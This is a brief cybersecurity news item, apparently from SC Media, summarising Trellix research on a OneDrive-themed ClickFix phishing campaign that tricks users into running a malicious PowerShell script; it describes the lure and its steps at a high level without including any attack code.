Phishing, Malware

Malicious PowerShell script executed in OneDrive phishing campaign

Share
PowerShell inscription on the background of computer code.

Microsoft OneDrive users in the U.S., South Korea, India, Germany, Ireland, Norway, Italy, and the UK, have been lured to run a malicious PowerShell script compromising their systems as part of the OneDrive Pastejacking phishing and downloader attack campaign, The Hacker News reports.

Intrusions commence with the delivery of phishing emails with an HTML file, which when clicked prompts a OneDrive connection failure notice that includes "How to fix" and "Details" options, according to a Trellix analysis. Targets clicking "How to fix" would be prompted to perform several procedures that result in the execution of ipconfig /flushdns and the creation of a 'downloads' folder on the C drive, where an archive file would be downloaded. Such an archive file would then be renamed and have its contents extracted before script execution, said Trellix security researcher Rafael Pena. Proofpoint, ReliaQuest, and McAfee previously reported similar phishing campaigns leveraging the ClickFix attack technique.

Related Terms

Adware

Get daily email updates

SC Media's daily must-read of the most current and pressing daily news

By clicking the Subscribe button below, you agree to SC Media Terms of Use and Privacy Policy.